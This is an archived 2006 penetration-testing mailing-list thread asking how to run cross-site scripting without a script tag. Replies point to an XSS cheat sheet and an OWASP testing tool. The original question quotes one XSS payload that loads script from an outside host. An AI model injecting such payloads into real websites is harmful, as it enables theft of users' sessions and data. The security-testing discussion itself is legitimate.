RE: XSS - how to run script



One of the best repositories of exotic ways to perform XSS
(with or without evasion, with or without script tag) is the
XSS cheat sheet:
http://ha.ckers.org/xss.html

I Agree 100%. I would look at the Cal9000 tool on the OWASP website.
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
It uses Rsnakes XSS library and includes it in a Website/Tool/Scratchpad to
use during these APP tests. I put Cal9000 on the first version of the OWASP
Live CD but it won't be released for another Month. If you use it just make
sure your Browser is Firefox... It doesn't like Opera or others.

Cheers,

JP



Joshua Perrymon, CE|H,OPST,OPSA

Sr. Security Consultant

-----------------------------------------

Pure Hacking - The Leaders In Internet Security



-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx
[mailto:listbounce@xxxxxxxxxxxxxxxxx] On Behalf Of A. R.
Sent: Friday, 20 October 2006 6:23 AM
Cc: Penetration Testing; Web Application Security
Subject: Re: XSS - how to run script

One of the best repositories of exotic ways to perform XSS
(with or without evasion, with or without script tag) is the
XSS cheat sheet:
http://ha.ckers.org/xss.html

hth

--
icesurfer

Tal Argoni wrote:
Does anyone have any
techniques/knowledge/examples/ideas/etc
of how it possible to run script
without using the <script> tag,
and without evasion techniques ?
<script
src=http://www.www.com/XSS.js></script>
Thanks allot
LegendaryZion




----------------------------------------------------------------------
--
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.

http://www.cenzic.com/products_services/download_hailstorm.php?camp=70
1600000008bOW

----------------------------------------------------------------------
--



--------------------------------------------------------------
----------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php
?camp=701600000008bOW
--------------------------------------------------------------
----------







------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------



Relevant Pages

  • Re: XSS - how to run script
    ... without evasion, with or without script tag) is the XSS cheat sheet: ... > Cenzic Hailstorm finds vulnerabilities fast. ...
    (Pen-Test)
  • Re: XSS - how to run script
    ... without evasion, with or without script tag) is the XSS cheat sheet: ... Cenzic Hailstorm finds vulnerabilities fast. ...
    (Pen-Test)
  • Re: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compi
    ... > without compiling the script tag as it is inside the ... >> We have made a small script. ... >> the alert function. ...
    (Full-Disclosure)
  • RE: DNS mapping
    ... The tool bidiblah was then based off of a lot of the methods described ... Subject: DNS mapping ... inputting the address test.com to the script and then ... Cenzic Hailstorm finds vulnerabilities fast. ...
    (Pen-Test)
  • RE: DNS mapping
    ... Onderwerp: DNS mapping ... I was wondering if there is an easy way to write a script to use for reverse ... Cenzic Hailstorm finds vulnerabilities fast. ... Click the link to buy it, try it or download Hailstorm for FREE. ...
    (Pen-Test)